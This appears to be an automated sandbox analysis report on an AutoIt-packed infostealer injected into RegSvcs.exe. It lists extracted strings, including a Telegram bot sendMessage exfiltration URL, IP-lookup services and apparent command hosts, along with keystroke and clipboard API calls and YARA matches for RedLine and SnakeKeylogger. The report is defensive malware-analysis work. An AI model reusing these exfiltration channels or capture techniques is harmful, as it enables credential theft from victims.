Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/sfig2.crt0
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certs.starfieldtech.com/repository/1402
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfig2s1-677.crl0c
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot-g2.crl0L
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.starfieldtech.com/sfroot.crl0L
Source: RegSvcs.exe, 00000004.00000002.4581223186.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.starofseasmarine.com
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/08
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0;
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.starfieldtech.com/0F
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:358075%0D%0ADate%20a
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FBB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585473166.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581223186.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://certs.starfieldtech.com/repository/0
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjq
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000004.00000002.4582299740.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000004.00000002.4583666104.000000000414E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegSvcs.exe, 00000004.00000002.4582299740.000000000302F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4582299740.0000000003020000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegSvcs.exe, 00000004.00000002.4582299740.000000000302A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBjq

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49792 version: TLS 1.2

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00654164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00654164

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00654164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00654164

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00653F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00653F66

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0064001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_0064001C

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0066CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_0066CABC

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.2.C5JLkBS1CX.exe.3750000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.C5JLkBS1CX.exe.ef0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4580969067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.2153263594.0000000000EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000003.00000002.2185993029.0000000003750000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: This is a third-party compiled AutoIt script.	0_2_005E3B3A
Source: C5JLkBS1CX.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: C5JLkBS1CX.exe, 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9649f672-0
Source: C5JLkBS1CX.exe, 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_cbdb20f8-5
Source: C5JLkBS1CX.exe, 00000003.00000000.2152454246.0000000000694000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_beb93388-1
Source: C5JLkBS1CX.exe, 00000003.00000000.2152454246.0000000000694000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_3715cebf-5
Source: C5JLkBS1CX.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_5265a605-5
Source: C5JLkBS1CX.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_2615c6b4-7

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0064A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_0064A1EF

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00638310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00638310

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_006451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006451BD

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005EE6A0	0_2_005EE6A0
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060D975	0_2_0060D975
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005EFCE0	0_2_005EFCE0
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006021C5	0_2_006021C5
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006162D2	0_2_006162D2
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006603DA	0_2_006603DA
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0061242E	0_2_0061242E
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_006025FA	0_2_006025FA
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0063E616	0_2_0063E616
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F66E1	0_2_005F66E1
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0061878F	0_2_0061878F
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00616844	0_2_00616844
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00660857	0_2_00660857
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F8808	0_2_005F8808
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00648889	0_2_00648889
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060CB21	0_2_0060CB21
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00616DB6	0_2_00616DB6
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F6F9E	0_2_005F6F9E
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F3030	0_2_005F3030
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060F1D9	0_2_0060F1D9
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00603187	0_2_00603187
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005E1287	0_2_005E1287
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00601484	0_2_00601484
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F5520	0_2_005F5520
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00607696	0_2_00607696
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F5760	0_2_005F5760
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00601978	0_2_00601978
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00619AB5	0_2_00619AB5
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00667DDB	0_2_00667DDB
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060BDA6	0_2_0060BDA6
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_00601D90	0_2_00601D90
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005EDF00	0_2_005EDF00
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_005F3FE0	0_2_005F3FE0
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0118B468	0_2_0118B468
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 3_2_0108F360	3_2_0108F360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00408C60	4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040DC11	4_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00407C3F	4_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00418CCC	4_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00406CA0	4_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004028B0	4_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0041A4BE	4_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00418244	4_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00401650	4_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402F20	4_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004193C4	4_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00418788	4_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402F89	4_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00402B90	4_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004073A0	4_2_004073A0
